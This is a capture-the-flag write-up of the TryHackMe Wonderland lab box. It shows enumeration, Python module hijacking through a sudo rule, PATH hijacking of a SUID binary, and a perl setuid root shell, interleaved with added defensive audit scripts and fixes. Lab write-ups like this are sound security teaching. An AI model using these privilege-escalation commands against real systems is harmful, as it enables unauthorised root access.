WriteUp — THM Wonderland

Jari Laurila
4 min read · Oct 13, 2020

Fall down the rabbit hole and enter wonderland.

This is a writeup for the TryHackMe room Wonderland. Let’s see how deep the rabbit hole goes! For my writeup for the next part in the Lewis Carroll themed rooms go here.

NMAP

nmap -sC -sV -p- 10.10.253.192
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-13 15:34 EEST
Nmap scan report for 10.10.253.192
Host is up (0.053s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8e:ee:fb:96:ce:ad:70:dd:05:a9:3b:0d:b0:71:b8:63 (RSA)
| 256 7a:92:79:44:16:4f:20:43:50:a9:a8:47:e2:c2:be:84 (ECDSA)
|_ 256 00:0b:80:44:e6:3d:4b:69:47:92:2c:55:14:7e:2a:c9 (ED25519)
80/tcp open http Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
|_http-title: Follow the white rabbit.
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web server enumeration

gobuster -q -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.253.192 dir
/img (Status: 301)
/r (Status: 301)

going to /r tells to

so go to http://10.10.253.192/r/a/b/b/i/t/ where the trail seems to stop. Always worth checking page source and there is something hidden:

<!DOCTYPE html>

<head>
<title>Enter wonderland</title>
<link rel="stylesheet" type="text/css" href="/main.css">
</head>

<body>
<h1>Open the door and enter wonderland</h1>
<p>"Oh, you’re sure to do that," said the Cat, "if you only walk long enough."</p>
<p>Alice felt that this could not be denied, so she tried another question. "What sort of people live about here?"
</p>
<p>"In that direction,"" the Cat said, waving its right paw round, "lives a Hatter: and in that direction," waving
the other paw, "lives a March Hare. Visit either you like: they’re both mad."</p>
<p style="display: none;">alice:__REDACTED__</p>
<img src="/img/alice_door.png" style="height: 50rem;">
</body>

Another enumeration here might be a good idea. But since that looks like a username and password pair, try to log in over SSH. Bingo! No user flag in sight, but there is a curious Python program in alice’s directory. Looking at sudo we see that we can execute it as rabbit.

sudo -l
[sudo] password for alice:
Matching Defaults entries for alice on wonderland:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User alice may run the following commands on wonderland:
(rabbit) /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

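OK, this would be too easy if the Python file were writable. But the program starts with import random: can we create random.py in the same directory and have it run instead? Python puts the script's own directory first on its module search path, so a random.py there is imported ahead of the standard library module. Create the file as follows: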

import pty
pty.spawn("/bin/bash")

Then sudo into rabbit:

sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py
rabbit@wonderland:~$ whoami
rabbit
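
Why the planted random.py wins, seen from the defender's side. This is an added example, not code from the room or the original writeup: it lists which imports of a script are, or could be, satisfied from the script's own directory. The script name poem.py and the temporary directory are constructed for the demo.

```python
import ast
import importlib.machinery
import os
import sys
import tempfile

def imported_modules(source):
    """Top-level module names pulled in by absolute imports in a script."""
    names = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names.update(a.name.split(".")[0] for a in node.names)
        elif isinstance(node, ast.ImportFrom) and node.level == 0 and node.module:
            names.add(node.module.split(".")[0])
    return names

def audit_script(script_path):
    """Return (shadowed, plantable) for a script run as `python script.py`.

    Python puts the script's directory first on sys.path, ahead of the
    standard library, so a random.py beside the script wins `import random`.
    Built-in modules (sys, ...) are resolved before sys.path and are skipped.
    """
    script_dir = os.path.dirname(os.path.abspath(script_path))
    with open(script_path) as fh:
        names = imported_modules(fh.read()) - set(sys.builtin_module_names)
    importlib.invalidate_caches()  # the directory listing may have changed
    shadowed = {}
    for name in sorted(names):
        spec = importlib.machinery.PathFinder.find_spec(name, [script_dir])
        if spec is not None:
            shadowed[name] = spec.origin
    # If the caller can write to the directory, the remaining imports can be planted.
    plantable = sorted(names - set(shadowed)) if os.access(script_dir, os.W_OK) else []
    return shadowed, plantable

def demo():
    """Constructed layout: a script importing random inside a writable directory."""
    with tempfile.TemporaryDirectory() as d:
        script = os.path.join(d, "poem.py")  # hypothetical stand-in script
        with open(script, "w") as fh:
            fh.write("import random\nimport sys\nprint(random.choice('ab'))\n")
        before = audit_script(script)
        with open(os.path.join(d, "random.py"), "w") as fh:
            fh.write("# benign placeholder that would shadow the stdlib module\n")
        return before, audit_script(script)

if __name__ == "__main__":
    print(demo())
```

Running the interpreter with -I (isolated mode) keeps the script's directory off sys.path, which closes this route for a sudoers entry like the one above.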

Enumerate home directory:

cd /home/rabbit
rabbit@wonderland:/home/rabbit$ ls -la
total 40
drwxr-x--- 2 rabbit rabbit 4096 May 25 17:58 .
drwxr-xr-x 6 root root 4096 May 25 17:52 ..
lrwxrwxrwx 1 root root 9 May 25 17:53 .bash_history -> /dev/null
-rw-r--r-- 1 rabbit rabbit 220 May 25 03:01 .bash_logout
-rw-r--r-- 1 rabbit rabbit 3771 May 25 03:01 .bashrc
-rw-r--r-- 1 rabbit rabbit 807 May 25 03:01 .profile
-rwsr-sr-x 1 root root 16816 May 25 17:58 teaParty

There is a suid program here. Let’s try to see what it does.

./teaParty 
Welcome to the tea party!
The Mad Hatter will be here soon.
Probably by Tue, 13 Oct 2020 14:09:03 +0000
Ask very nicely, and I will give you some tea while you wait for him
foo
Segmentation fault (core dumped)

It gets some input but then crashes. ltrace is available:

ltrace ./teaParty
setuid(1003) = -1
setgid(1003) = -1
puts("Welcome to the tea party!\nThe Ma"...Welcome to the tea party!
The Mad Hatter will be here soon.
) = 60
system("/bin/echo -n 'Probably by ' && d"...Probably by Tue, 13 Oct 2020 14:10:23 +0000
<no return ...>
--- SIGCHLD (Child exited) ---
<... system resumed> ) = 0
puts("Ask very nicely, and I will give"...Ask very nicely, and I will give you some tea while you wait for him
) = 69
getchar(1, 0x560d35420260, 0x7f979927e8c0, 0x7f9798fa1154foo
) = 102
puts("Segmentation fault (core dumped)"...Segmentation fault (core dumped)
) = 33
+++ exited (status 33) +++

Pretty funny. Let’s use Cutter to reverse the binary:

void main(void)
{
    setuid(0x3eb);
    setgid(0x3eb);
    puts("Welcome to the tea party!\nThe Mad Hatter will be here soon.");
    system("/bin/echo -n \'Probably by \' && date --date=\'next hour\' -R");
    puts("Ask very nicely, and I will give you some tea while you wait for him");
    getchar();
    puts("Segmentation fault (core dumped)");
    return;
}

Uh oh, date is called by bare name rather than by absolute path, so the shell started by system() resolves it through PATH. Same procedure as every time.

echo "/bin/bash" > date
chmod a+x date
PATH=.:$PATH
./teaParty
whoami
hatter
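
The PATH lookup behind this step, as an added audit example (not part of the original writeup or the room): it picks out the commands in a system() string that are resolved through PATH, then walks a PATH in order to show which entries are searched before the real binary. The directory layout is constructed for the demo.

```python
import os
import shlex
import stat
import tempfile

# The string teaParty hands to system(), as recovered in the decompilation above.
TEAPARTY_CMD = "/bin/echo -n 'Probably by ' && date --date='next hour' -R"

def bare_commands(cmdline):
    """Command words in a shell string that contain no '/' (resolved via PATH)."""
    found, at_command = [], True
    for tok in shlex.shlex(cmdline, posix=True, punctuation_chars=True):
        if tok in {"&&", "||", ";", "|", "&"}:
            at_command = True
        elif at_command:
            at_command = False
            if "/" not in tok:
                found.append(tok)
    return found

def resolve(name, path, cwd):
    """Search PATH in order; return (winner, exposed entries up to the winner)."""
    # Exposed: relative ("." or "") or world-writable, so a planted file wins.
    exposed = []
    for entry in path.split(":"):
        directory = os.path.join(cwd, entry or ".")
        if not os.path.isabs(entry) or (
                os.path.isdir(directory) and os.stat(directory).st_mode & stat.S_IWOTH):
            exposed.append(entry)
        candidate = os.path.join(directory, name)
        if os.path.isfile(candidate) and os.access(candidate, os.X_OK):
            return candidate, exposed
    return None, exposed

def demo():  # constructed PATH: ".", a world-writable dir, then the real dir
    with tempfile.TemporaryDirectory() as cwd:
        drop, bindir = os.path.join(cwd, "drop"), os.path.join(cwd, "bin")
        for d, mode in ((drop, 0o777), (bindir, 0o755)):
            os.mkdir(d)
            os.chmod(d, mode)
        real = os.path.join(bindir, "date")
        open(real, "w").close()
        os.chmod(real, 0o755)
        return (bare_commands(TEAPARTY_CMD),
                resolve("date", ".:" + drop + ":" + bindir, cwd),
                resolve("date", bindir, cwd))

if __name__ == "__main__":
    print(demo())
```

In a SUID program the fix is to call the binary by absolute path or to set a fixed PATH before system(), since the caller controls the inherited environment.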

Too bad it doesn’t setuid() to root but we take what we get. Enumerate hatter’s home directory:

cat password.txt 
__REDACTED__

which seems to be hatter’s SSH password so we can skip the previous steps if we need to login again.

Looking for flags… I had to check the hint that says: “Everything is upside down here.” There is a root flag in user directory so does that mean that root has user flag? ls -la: Permission denied. But:

cat /root/user.txt
thm{“__REDACTED__”}

That took me more than an hour to figure out. Now need to figure out how to privesc to get root.

Run linPEAS. This entry seems interesting:

GTFOBins has the exploit:

perl -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";'
whoami
root
cat /home/alice/root.txt
thm{__REDACTED__}

So it seems we are at the bottom. Or are we?
